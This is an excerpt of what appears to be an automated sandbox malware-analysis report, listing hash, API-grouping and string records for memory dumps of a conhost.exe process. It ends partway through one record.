        • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction Fuzzy Hash: 7E51AF31209B4795EB06EB24F8662F823A2BB45794F840A35F6AC077A9EF78D518C340
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID: $rbx-
        • API String ID: 756756679-3661604363
        • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction ID: 7ad5e0cdfcc95334fb8fd4ec7dc1dc4253cbf49502700603a4c06fc108fb9e49
        • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction Fuzzy Hash: 8D318E32709B9286EB11DF16FA46BB9A7A2FB44B84F084134EF8807B55FF38C4658700
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: ErrorLast$Value$FreeHeap
        • String ID:
        • API String ID: 365477584-0
        • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction ID: a907ab31da723ac85bdfd29137dc5d0cbe96778529b111c9dbc18d706e002bcb
        • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction Fuzzy Hash: 1E111831659647C2FB58F772B8677FE2253AB85BA0F949734F9A65A3CADE38C4014300
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID:
        • API String ID: 517849248-0
        • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction ID: 994895f683b435be3ff243f7ab7ada42fefba1b26e7359f05ff014dcfdd1bd54
        • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction Fuzzy Hash: 9A01DB35718B4286EB14DB12F8597B9A3A2F788FD0F484135EE9D43B54EE78C585C740
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
        • String ID:
        • API String ID: 449555515-0
        • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction ID: ff181f9c9a7897f34b16c56e0406d8d5e4428b24093c32083cc7f3fa565c28bd
        • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction Fuzzy Hash: 50011B75219B42C2EB25DB21F85A7B563A2AB85B85F040135E98D073A4FF3DC1588740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: FinalHandleNamePathlstrlen
        • String ID: \\?\
        • API String ID: 2719912262-4282027825
        • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction ID: 1c9aa7b96fdd696cf103e787c51e7c4cccc78a8d00351f7a2e017d2962e21e1f
        • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction Fuzzy Hash: 12F04472318B86D2E720CB21F5893F9A363F744B88F844135EA8946954EE6DC689C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CombinePath
        • String ID: \\.\pipe\
        • API String ID: 3422762182-91387939
        • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction ID: 3c15d1a11382aae84e62f0bfbc96c186085b4c1163e30c35cfdb9af19976f5db
        • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction Fuzzy Hash: 95F08C74718B8282EB54CB13BA191B9A262BB48FC0F488131FE5A0BB18FE2CC446C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction ID: 2733034fc366f125efd7768d010bfb3152609d5befca942c9e76f27b5a8d753b
        • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction Fuzzy Hash: 99F0307125974281EB14CB24F8967B96362EB89761F540739EAAA495E8DF2CC448C740
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction ID: be0334f446da401b8d26960be9932e2715ff3c1a0ccdba57b86d4208490c8057
        • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction Fuzzy Hash: 3002B53621DB8586E760CB55F4957BAB7A2F384794F104126FACE87BA8DB7DC484CB00
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction ID: ce3e39a34d6e425e994af073e649132c5dc6850918b34bf8a61b4df71d278df2
        • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction Fuzzy Hash: 2751A435608A0287E765CF16F456BFAB3A2F788B94F504239EE9A43754DF78D845CB00
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction ID: d4a39735f6b28e773b2e4a7e2fddb3bc6517631a46f63e32ad56cd9b36ab03f1
        • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction Fuzzy Hash: BE517E35218A4287E764CF16F8517BAB3A3F789B94F504239EE9A43754DF79D806CB00
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction ID: 45e2a1e3ae6f8ce571f98fcc9ac2b75d591273fb636eb5935ebe342970c3509b
        • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction Fuzzy Hash: 9661C53612DA8586E760CB15F4567BAB7A2F388788F100226FACD47BA8DB7DC540CF41
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModule
        • String ID:
        • API String ID: 1092925422-0
        • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction ID: 616fc8e841c2245b51791be6a37ee32d8900f2bb04da3a702710a6d3d6dbec9f
        • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction Fuzzy Hash: E9112E36A0974293EB24DB21F5052BA67B1FB44B80F140136FA8D03794FB7DC955C784
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
        • String ID: csm
        • API String ID: 2395640692-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: 45de8e6a20390779af9f9e1f454ddde026f3e10040f5e7abd99963213620a969
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 2B51A2323196028ADB54CF19F449BBC7793E394B98F544A35FA8E47788DB78C841CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: 65afe3b49f3e94a000483bd8e0f4653e7ac2ad2b90735d2ef3b6efecdb3f5d06
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: B5515D3220C6828BEB74CF22A5463BC77A3F754B96F144326EAD947B95CB38C452C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CallEncodePointerTranslator
        • String ID: MOC$RCC
        • API String ID: 3544855599-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: c9c92eabbec959ce24350a47c370c98e59e4e30f137f6e1398bcc687353b0223
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: EE615832518B8585EB20DB15F4427FEB7A1F785B99F044325EBD81BB99DB78C190CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: 430e7c8bcc295388a9f2a6e521ba53b2e508c631e94a1a77aabe53e6d3a7ff2b
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: AD518F322083828AFB74AF22A1443F877A6F355B94F174135FE9947BA9DB39C558CB01
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID: pid_
        • API String ID: 517849248-4147670505
        • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction ID: 141ae7aa78bfd420d1d285258ce01ae9c4e971c699ba2c01c0f5847ca8e4e20c
        • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction Fuzzy Hash: CA114F31318B8391EB10DB26FD063FA63A6B744780F944635FA9983699FF68C905C700
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: FileWrite$ConsoleErrorLastOutput
        • String ID:
        • API String ID: 2718003287-0
        • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction ID: 6085f66fa63b377519f5468ed2b769289ff0597182212274bdd233c3b20b3e12
        • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction Fuzzy Hash: 80D1CB32B18B8589E711CFA9E4412FC37B3F354B98F444226EE5EA7B99DA34C55AC340
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$Free
        • String ID:
        • API String ID: 3168794593-0
        • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction ID: 2a70a3e7bf5ea086a3ac225e7f2dcf3bb41dbe0460bf40e4871848235bb69038
        • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction Fuzzy Hash: 9E01D732654B91DAE714DF66A8091A9B7A2F788F80B094039EB8953728EE34D451C740
        APIs
        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001FD186E28DF), ref: 000001FD186E2A12
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: ConsoleMode
        • String ID:
        • API String ID: 4145635619-0
        • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction ID: d54c42a256fd6f24e9bec34f007e6bd85acbb17e5a0f2cf97402507ef6b0c2a9
        • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction Fuzzy Hash: 8891D0326587528DFB64CF66A8527FD3BA3F354B88F44512AEE4A57B85DB34C486C300
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
        • String ID:
        • API String ID: 2933794660-0
        • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction ID: 9e0d45b8f41a04612e167494d15ba1ecdde1cd64f4c94a55f9340444dd7e9ae6
        • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction Fuzzy Hash: 9C11273A754F068AEB00CF60F85A3F833A4F719758F441E35EA6D867A4EB78C1588340
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: FileType
